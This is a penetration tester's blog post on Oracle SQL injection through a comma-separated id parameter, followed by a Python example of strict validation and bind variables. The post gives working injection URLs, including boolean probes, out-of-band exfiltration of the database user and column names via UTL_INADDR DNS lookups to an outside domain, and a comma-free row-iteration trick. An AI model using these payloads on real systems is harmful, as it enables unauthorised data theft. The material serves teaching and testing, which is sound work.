Recently I came across a SQL injection against an Oracle database where the vulnerable parameter took comma-separated input.
Thus a valid request looked like:- index.do?id=1,200
It was easy to confirm the parameter was injectable by provoking true and false responses:-
True response:- index.do?id=1,200 and 1=1
False response:- index.do?id=1,200 and 1=2
This way I could carry out blind SQL injection, but I then tried to retrieve data through an out-of-band channel, and that worked too:-
example:-index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(
(SELECT+user+from+dual)||'.a.notsosecure.com')+FROM+dual)+is+not+null
However, the problem arose when I had to retrieve data by iterating through rows. To iterate through rows I normally use the following syntax:-
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9;
But as this application was taking comma-separated values, the comma in "ROWNUM r, username" changed how my query was parsed, and the application returned an error.
A solution is to use a query of this form, which contains no comma at all:-
index.php?id=1,200+and(SELECT+UTL_INADDR.get_host_address(
(SELECT+column_name+from+all_tab_columns+where+rownum<2+and+
column_name+not+in
(select+column_name+from+all_tab_columns where+rownum<4 ))||
'.a.notsosecure.com')+FROM+dual)+is+not+null
By increasing the rownum limit of the inner subquery (rownum<4 in the example above, which was highlighted in bold in the original post), iteration through the rows could be achieved. However, as this number increases the backend queries become more and more CPU intensive, since each request re-selects every row excluded so far. I still could not do a UNION SELECT query, as the original query selects more than one column and I could not figure out a way to write a UNION SELECT without entering a comma.
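The root cause above is that the comma-separated id list is spliced into the SQL text, so anything after the numbers (a condition, a subquery calling UTL_INADDR) is parsed as SQL. As an added defensive example, not part of the original post, the following Python shows how such a parameter should be handled server-side: the input is validated against a strict integer-list grammar and every id becomes an Oracle bind variable. The table and column names (items, id, name) and the MAX_IDS cap are assumptions for illustration.

```python
import re
from typing import List, Tuple

# Strict grammar for the id parameter: one or more decimal integers
# separated by single commas, nothing else (no spaces, operators or quotes).
_ID_LIST = re.compile(r"[0-9]{1,18}(,[0-9]{1,18})*")

# Oracle rejects IN-lists with more than 1000 entries (ORA-01795); a smaller
# application-level cap also bounds the cost of each query.
MAX_IDS = 200  # assumed application policy, not from the original post


def parse_id_list(raw: str) -> List[int]:
    """Return the integer ids in a comma-separated parameter, or raise ValueError."""
    if not _ID_LIST.fullmatch(raw):
        raise ValueError("id parameter must be comma-separated integers")
    ids = [int(tok) for tok in raw.split(",")]
    if len(ids) > MAX_IDS:
        raise ValueError("too many ids")
    return ids


def build_lookup(raw: str) -> Tuple[str, dict]:
    """Build an Oracle statement with one bind variable per id.

    The SQL text never contains user data; values travel as binds, so an
    input like '1,200 and 1=1' is rejected before any SQL is built, and even
    a value that passes can only ever be compared as a number.
    Table/column names are assumed for the example.
    """
    ids = parse_id_list(raw)
    placeholders = ", ".join(f":id{i}" for i in range(len(ids)))
    sql = f"SELECT id, name FROM items WHERE id IN ({placeholders})"
    binds = {f"id{i}": v for i, v in enumerate(ids)}
    return sql, binds


def is_valid_id_list(raw: str) -> bool:
    """Predicate form of the validator, usable in request filtering or tests."""
    try:
        parse_id_list(raw)
        return True
    except ValueError:
        return False
```

The returned (sql, binds) pair is what you would hand to an Oracle driver's execute call; the boolean and out-of-band probes from this post all fail validation at parse_id_list.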
----
A good resource for pentesting Oracle Application Server can be found here:-
Oracle Application Scanner (OAPscan) is also a very handy tool.
---